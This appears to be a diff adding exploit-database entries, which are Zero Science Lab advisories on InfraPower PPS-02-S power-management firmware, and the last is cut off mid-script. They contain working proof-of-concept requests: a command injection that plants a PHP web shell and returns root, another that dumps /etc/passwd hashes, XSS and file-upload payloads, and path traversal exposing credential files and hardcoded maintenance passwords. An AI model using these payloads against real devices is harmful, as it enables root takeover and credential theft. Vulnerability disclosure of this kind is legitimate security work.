+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
+
+
+27.09.2016
+
+--
+
+
+doupgrate.php:
+--------------
+
+
+09:
+10: echo "Firmware Upgrate Using NFS:
";
+11: echo "IP=".$_POST["ipaddr"]."
";
+12: echo "Firmware Name=".$_POST["fwname"]."
";
+13: system("sh nfs.sh");
+14: echo "Mounting NFS
";
+15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
+16: system("cp /nfs/".$_POST["fwname"]." /");
+17: echo "Flash erasing
";
+18: system("@flash_eraseall /dev/mtd0");
+19: system("cp /".$_POST["fwname"]." /dev/mtd0");
+20: echo "Upgrate done
";
+21: system("umount /nfs");
+22: echo "Reboot system
";
+23: system("reboot");
+24: ?>
+
+---------------------------------------------------------------------
+
+
+IPSettings.php:
+---------------
+
+
+83: $IP_setting = ereg_ip($_POST['IP']);
+84: $Netmask_setting = ereg_ip($_POST['Netmask']);
+85: $Gateway_setting = ereg_ip($_POST['Gateway']);
+...
+...
+110: $fout = fopen("/mnt/mtd/net_conf", "w");
+111: if($fout){
+112: $output = substr($output, 0, -1);
+113: fprintf($fout, "%s", $output);
+114: //echo $change_ip.'b';
+115: if($change_ip === '1'){
+116: $str = '';
+117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
+118: // echo $str."\n";
+119: }
+120: if($change_gw === '1'){
+121: $str = '';
+122: exec('ip route del default', $str);
+123: exec('route add default gw '.$Gateway_setting, $str);
+124: // echo $str[0]."a\n";
+125: }
+126: }
+127: fclose($fout);
+...
+...
+164: function ereg_ip($ipstring){
+165: $ipstring=trim($ipstring); //移除前後空白
+166: //格式錯誤
+167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
+168: //內容檢查
+169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
+170: foreach($ip_segment as $k =>$v){
+171: if($v >255){
+171: return 0;
+172: }
+173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
+174: } //end foreach
+175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
+176: return $ipstring;
+177: }
+
+---------------------------------------------------------------------
+
+
+Login.php:
+----------
+
+
+126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
+127: $Password = getConf("/mnt/mtd/web_conf", "Password");
+128:
+129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
+130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
+...
+...
+140: $_SESSION['Login'] = $_POST['ID_User'];
+141:
+142: //Login
+143: $loginTime = date("Y-m-d,H:i:s.0,P");
+144: $remoteIP = $_SERVER['REMOTE_ADDR'];
+145: //----------SNMP checking ---Ed 20130307------------------------<
+146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
+147: if ($SNMPEnable == "1") {
+148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
+149: if ($TrapEnable == "v2Trap") {
+150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
+151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
+152: //echo "alert($res);";
+153: }
+154: }
+
+---------------------------------------------------------------------
+
+
+Ntp.php:
+--------
+
+
+36:
+
+---------------------------------------------------------------------
+
+
+production_test1.php:
+---------------------
+
+
+4: if( isset($_POST['macAddress']) )
+5: {
+6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
+7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
+8: /*$result = $fail;
+9: echo $mac . ",";
+10: echo $_POST['macAddress'];
+11: if( !strcmp($mac,$_POST['macAddress']) )
+12: $result = $success;
+13: echo "verify - " . $mac . " - " . $result;*/
+14: echo "verify - " . $mac;
+15:
+16: exit();
+17: }
+
+---------------------------------------------------------------------
+
+
+SNMP.php:
+---------
+
+
+34: if($_POST["SNMPAgent"] === "Enable"){
+35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
+36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
+37:
+38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
+39: {
+40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
+41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
+42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
+43: setSnmpConf(1,$_POST["CommuintyString"]);
+44: setSnmpConf(2,$_POST["CommuintyWrite"]);
+45: $pCommunity = $_POST["CommuintyString"];
+46: }
+
+---------------------------------------------------------------------
+
+
+System.php:
+-----------
+
+
+86: if(!empty($_POST['ChangeTime']) == "1"){
+87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
+88:
+89: //Ray modify
+90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
+91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
+92:
+93:
+94: if(isset($_POST['TimeZone'])){
+95: setTimeZone($_POST['TimeZone']);
+96: $orgZone = $_POST['TimeZone'];
+97: }
+98:
+99: exec('date '.$datetime);
+100: exec('hwclock -w');
+101: exec('hwclock -w -f /dev/rtc1');
+...
+...
+180: if(isset($_POST['TimeServer'])){
+181: //$TimeServer = ereg_ip($_POST['TimeServer']);
+182: if(!empty($_POST['TimeServer'])){
+183: $TimeServer = $_POST['TimeServer'];
+184:
+185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
+...
+...
+286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
+...
+...
+292: exec('route add default gw '.$Gateway_setting, $str);
+...
+...
+336: function ereg_ip($ipstring){
+337: $ipstring=trim($ipstring); //移除前後空白
+338: //格式錯誤
+339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
+340: //內容檢查
+341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
+342: foreach($ip_segment as $k =>$v){
+343: if($v >255){
+344: return 0;
+345: }
+346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
+347: } //end foreach
+348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
+349: return $ipstring;
+350: }
+
+---------------------------------------------------------------------
+
+
+UploadEXE.php:
+--------------
+
+
+72: if(isset($_POST['hasFile'])){
+73: if ($_FILES['ExeFile']['error'] > 0){
+74: echo 'Error: ' . $_FILES['FW']['error'];
+75: }else{
+76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'
';
+...
+...
+80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
+81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
+82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
+
+---------------------------------------------------------------------
+---------------------------------------------------------------------
+---------------------------------------------------------------------
+
+
+#1
+--
+
+PoC Request:
+
+curl -i -s -k -X 'POST' \
+ -H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
+ --data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
+ 'https://192.168.0.17/SNMP.php?Menu=SMP'
+
+...
+
+curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
+
+Response:
+
+root
+ at
+Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
+
+
+#2
+--
+
+PoC Request:
+
+POST /production_test1.php HTTP/1.1
+Host: 192.168.0.17
+User-Agent: ZSL-Injectinator/3.1 (Unix)
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
+
+
+Response:
+
+HTTP/1.1 200 OK
+X-Powered-By: PHP/5.3.9
+Content-type: text/html
+Connection: close
+Date: Fri, 17 Jan 2003 16:58:52 GMT
+Server: lighttpd/1.4.30-devel-1321
+Content-Length: 751
+
+verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
diff --git a/platforms/php/webapps/40641.txt b/platforms/php/webapps/40641.txt
new file mode 100755
index 000000000..ea56b173d
--- /dev/null
+++ b/platforms/php/webapps/40641.txt
@@ -0,0 +1,235 @@
+InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
+when input passed via several parameters to several scripts is not properly
+sanitized before being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in context of an affected
+site.
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5369
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
+
+
+27.09.2016
+
+--
+
+
+#################################################################################
+
+GET /SensorDetails.php?Menu=SST&DeviceID=C100"> HTTP/1.1
+
+#################################################################################
+
+POST /FWUpgrade.php HTTP/1.1
+Host: 192.168.0.17
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
+Connection: close
+
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="FW"; filename="somefile.php"
+Content-Type: text/php
+
+t00t
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="upfile"
+
+somefile.php
+------WebKitFormBoundary207OhXVwesC60pdh
+Content-Disposition: form-data; name="ID_Page"
+
+Firmware.php?Menu=FRM
+------WebKitFormBoundary207OhXVwesC60pdh--
+
+
+#################################################################################
+
+POST /SNMP.php?Menu=SMP HTTP/1.1
+Host: 192.168.0.17
+
+SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
+
+#################################################################################
+
+
+lqwrm@zslab:~#
+lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
+-------------------------------------------------
+PHP Source Code Security Scanner v0.2
+(c) Zero Science Lab - http://www.zeroscience.mk
+Tue Sep 27 10:35:52 CEST 2016
+-------------------------------------------------
+
+Scanning recursively...Done.
+
+dball.php:
+
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
+
+
+doupgrate.php:
+
+Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 15: Command Injection in 'system' via '$_POST'
+Line 16: Command Injection in 'system' via '$_POST'
+Line 19: Command Injection in 'system' via '$_POST'
+
+
+Firmware.php:
+
+Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+Function.php:
+
+Line 257: Header Injection in 'header' via '$_SERVER'
+Line 267: Header Injection in 'header' via '$_SERVER'
+
+
+FWUpgrade.php:
+
+Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+
+
+index.php:
+
+Line 2: Header Injection in 'header' via '$_SERVER'
+
+
+IPSettings.php:
+
+Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
+Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
+Line 117: Command Injection in 'exec' via '$IP_setting'
+Line 117: Command Injection in 'exec' via '$Netmask_setting'
+Line 123: Command Injection in 'exec' via '$Gateway_setting'
+
+
+ListFile.php:
+
+Line 12: PHP File Inclusion in 'fgets' via '$fp'
+
+
+Login.php:
+
+Line 151: Command Injection in 'shell_exec' via '$_POST'
+
+
+Ntp.php:
+
+Line 46: Command Injection in 'exec' via '$idx'
+
+
+OutletDetails.php:
+
+Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
+Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
+Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+
+
+PDUStatus.php:
+
+Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+production_test1.php:
+
+Line 6: Command Injection in 'shell_exec' via '$_POST'
+Line 45: Command Injection in 'proc_open' via '$_ENV'
+
+
+SensorDetails.php:
+
+Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
+
+
+SensorStatus.php:
+
+Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
+
+
+SNMP.php:
+
+Line 41: Command Injection in 'exec' via '$_POST'
+
+
+System.php:
+
+Line 54: Header Injection in 'header' via '$_SERVER'
+Line 64: Header Injection in 'header' via '$_SERVER'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 99: Command Injection in 'exec' via '$datetime'
+Line 185: Command Injection in 'exec' via '$TimeServer'
+Line 286: Command Injection in 'exec' via '$IP_setting'
+Line 286: Command Injection in 'exec' via '$Netmask_setting'
+Line 292: Command Injection in 'exec' via '$Gateway_setting'
+
+
+UploadEXE.php:
+
+Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
+Line 82: Command Injection in 'popen' via '$_FILES'
+Line 96: PHP File Inclusion in 'fgets' via '$fp'
+Line 96: PHP File Inclusion in 'fgets' via '$buffer'
+
+
+WriteRequest.php:
+
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
+Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
+
+
+-----------------------------------------------------
+Scan finished. Check results in scan_output.txt file.
+
+lqwrm@zslab:~#
diff --git a/platforms/php/webapps/40642.txt b/platforms/php/webapps/40642.txt
new file mode 100755
index 000000000..ae55b5516
--- /dev/null
+++ b/platforms/php/webapps/40642.txt
@@ -0,0 +1,389 @@
+InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
+
+
+Vendor: Austin Hughes Electronics Ltd.
+Product web page: http://www.austin-hughes.com
+Affected version: Q213V1 (Firmware: V2395S)
+Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
+
+Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
+IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
+Patented IP Dongle provides IP remote access to the PDUs by a true
+network IP address chain. Only 1xIP dongle allows access to max. 16
+PDUs in daisy chain - which is a highly efficient cient application
+for saving not only the IP remote accessories cost, but also the true
+IP addresses required on the PDU management.
+
+Desc: InfraPower suffers from a file disclosure vulnerability when
+input passed thru the 'file' parameter to 'ListFile.php' script is
+not properly verified before being used to read files. This can
+be exploited to disclose contents of files from local resources.
+
+-------------------------------------------------------------------
+ListFile.php:
+-------------
+
+8: if(isset($_GET['file'])){
+9: $handle = $_GET['file'];
+10: $fp = fopen('/ramdisk/'.$handle, 'r');
+11: while(!feof($fp)){
+12: $tmp=fgets($fp,2000);
+13: $tmp = str_replace("\n","
",$tmp);
+14: echo $tmp;
+15: }
+16: fclose($fp);
+17: }
+
+-------------------------------------------------------------------
+
+
+Tested on: Linux 2.6.28 (armv5tel)
+ lighttpd/1.4.30-devel-1321
+ PHP/5.3.9
+ SQLite/3.7.10
+
+
+Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5370
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
+
+
+27.09.2016
+
+--
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
+
+root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
+bin:x:1:1:bin:/bin:/bin/sh
+daemon:x:2:2:daemon:/usr/sbin:/bin/sh
+adm:x:3:4:adm:/adm:/bin/sh
+lp:x:4:7:lp:/var/spool/lpd:/bin/sh
+sync:x:5:0:sync:/bin:/bin/sync
+shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
+operator:x:11:0:Operator:/var:/bin/sh
+nobody:x:99:99:nobody:/home:/bin/sh
+admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
+user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
+service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
+www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
+www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
+
+LoginAuth 1
+UserName 00000000
+Password 00000000
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
+
+dmin 999999
+manager 666666
+user 111111
+
+
+http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
+
+#!/bin/sh
+echo -n "Please enter maintenance password:"
+read -s pass
+InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
+if [ "$InfraType" == "1" ]; then
+if [ "$pass" != "InfraSolution" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "2" ]; then
+if [ "$pass" != "InfraGuard" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "3" ]; then
+if [ "$pass" != "InfraPower" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+if [ "$InfraType" == "4" ]; then
+if [ "$pass" != "InfraCool" ]; then
+echo "Invalid maintenance password!"
+exit 0
+fi
+else
+#---emergency recovery mode
+echo "DEBUG su mode started!"
+su
+fi
+fi
+fi
+fi
+
+# create menu
+echo ""
+echo "***********************************************"
+echo "* Maintenance Menu *"
+echo "***********************************************"
+echo "(1) View(vi) /mnt/mtd/main_conf "
+echo "(2) View /mnt/mtd/snmp_conf "
+echo "(3) View /mnt/mtd/net_conf "
+echo "(4) View /mnt/mtd/web_conf "
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo "(7) Clear all patching (/mnt/mtd/patch/) "
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo "(9) Process Monitoring "
+echo "(A) Patch SNMP "
+echo "(B) Restore Configuration "
+echo "(P) Restore INI, POL profiles "
+echo "(E) Execute command line "
+echo "(M) View meminfo "
+echo "(X) Terminal console mode "
+echo "(R) Reboot "
+echo "(?) This menu "
+echo "(Q) Exit "
+echo "***********************************************"
+while true; do
+echo -n "Input Maintenance menu item number(? for help):"
+read y
+case $y in
+"?")
+echo ""
+echo "***********************************************"
+echo "* Maintenance Menu *"
+echo "***********************************************"
+echo "(1) View(vi) /mnt/mtd/main_conf "
+echo "(2) View /mnt/mtd/snmp_conf "
+echo "(3) View /mnt/mtd/net_conf "
+echo "(4) View /mnt/mtd/web_conf "
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo "(7) Clear all patching (/mnt/mtd/patch/) "
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo "(9) Process Monitoring "
+echo "(A) Patch SNMP "
+echo "(B) Restore Configuration "
+echo "(P) Restore INI, POL profiles "
+echo "(E) Execute command line "
+echo "(M) View meminfo "
+echo "(X) Terminal console mode "
+echo "(R) Reboot "
+echo "(?) This menu "
+echo "(Q) Exit "
+echo "***********************************************"
+;;
+"1")
+echo "****/mnt/mtd/main_conf******************************"
+vi /mnt/mtd/main_conf
+echo "****************************************************"
+;;
+"2")
+echo "****/mnt/mtd/snmp_conf******************************"
+cat /mnt/mtd/snmp_conf
+echo "****************************************************"
+;;
+"3")
+echo "****/mnt/mtd/net_conf*******************************"
+cat /mnt/mtd/net_conf
+echo "****************************************************"
+;;
+"4")
+echo "****/mnt/mtd/web_conf*******************************"
+cat /mnt/mtd/web_conf
+echo "****************************************************"
+;;
+"5")
+echo "(5) Enable auto patching(boot.sh) on bootup "
+echo -n "Are you sure to continue? [y/n]:"
+read ans5
+if [ "$ans5" == "y" ]; then
+if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
+echo -n "Patching boot.sh ..."
+cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
+chmod 777 /mnt/mtd/boot.sh
+if [ -f "/mnt/mtd/boot.sh" ]; then
+echo "...done"
+else
+echo "...fail"
+fi
+else
+echo "file not exist: /mnt/mtd/patch/boot.sh"
+fi
+fi
+;;
+"6")
+echo "(6) Disable auto patching(boot.sh) on bootup "
+echo -n "Are you sure to continue? [y/n]:"
+read ans6
+if [ "$ans6" == "y" ]; then
+if [ -f "/mnt/mtd/boot.sh" ]; then
+echo -n "Disabling boot.sh pacthing..."
+rm /mnt/mtd/boot.sh
+echo "...done"
+else
+echo "File not exist: /mnt/mtd/boot.sh"
+fi
+fi
+;;
+"7")
+echo "(7) Clear /mnt/mtd/patch/ "
+echo -n "Are you sure to continue? [y/n]:"
+read ans7
+if [ "$ans7" == "y" ]; then
+echo -n " Removing patch files (/mnt/mtd/patch/*)..."
+rm -r /mnt/mtd/patch/*
+if [ ! -f "/mnt/mtd/patch/" ]; then
+echo "...done"
+echo -n "Reboot to apply changes? [y/n]:"
+read ans7r
+if [ "$ans7r" == "y" ]; then
+echo "Rebooting..."
+reboot
+fi
+
+else
+echo "...fail"
+fi
+fi
+;;
+"8")
+echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/www/patch/patch_now.sh" ]; then
+chmod 777 /www/patch/patch_now.sh
+sh /www/patch/patch_now.sh
+else
+echo "file not exist: /www/patch/patch_now.sh"
+fi
+fi
+;;
+"9")
+echo "****Process List*******************************"
+ps
+echo "***********************************************"
+;;
+"A")
+echo "(A) Patch SNMP "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/www/patch/snmplink.sh" ]; then
+sh /www/patch/snmplink.sh
+if [ -f "/www/snmplink.log" ]; then
+cat /www/snmplink.log
+fi
+echo "Patching SNMP and its modules...done"
+else
+echo "file not exist: /www/patch/snmplink.sh"
+fi
+fi
+;;
+"B")
+echo "(B) Restore Box Configuration(box_conf) "
+echo -n "Are you sure to continue? [y/n]:"
+read ans8
+if [ "$ans8" == "y" ]; then
+if [ -f "/etc/box_conf" ]; then
+echo "Patching /mnt/mtd/box_conf..."
+cp /etc/box_conf /mnt/mtd/box_conf
+if [ -f "/mnt/mtd/box_conf" ]; then
+echo "Patching /mnt/mtd/box_conf...done"
+else
+echo "Patching /mnt/mtd/box_conf...failed"
+fi
+else
+echo "file not exist: /etc/box_conf"
+fi
+fi
+;;
+"P")
+INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
+echo "(P) Restore INI, POL profiles for $INFRA_VER "
+echo -n "Are you sure to continue? [y/n]:"
+read ansP
+if [ "$ansP" == "y" ]; then
+if [ "$InfraType" == "1" ]; then
+echo "Restoring INI, POL profiles for $INFRA_VER..."
+if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
+cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
+echo "...done"
+fi
+if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
+cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
+echo "...done"
+fi
+if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
+cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
+echo "...done"
+fi
+if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
+cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
+echo "...done"
+fi
+if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
+cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
+echo "...done"
+fi
+if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
+cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
+echo "...done"
+fi
+if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
+echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
+cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
+echo "...done"
+fi
+if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
+echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
+cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
+echo "...done"
+fi
+fi
+fi
+;;
+"E")
+echo -n "Input command line:"
+read cmd_line
+$cmd_line
+;;
+"M")
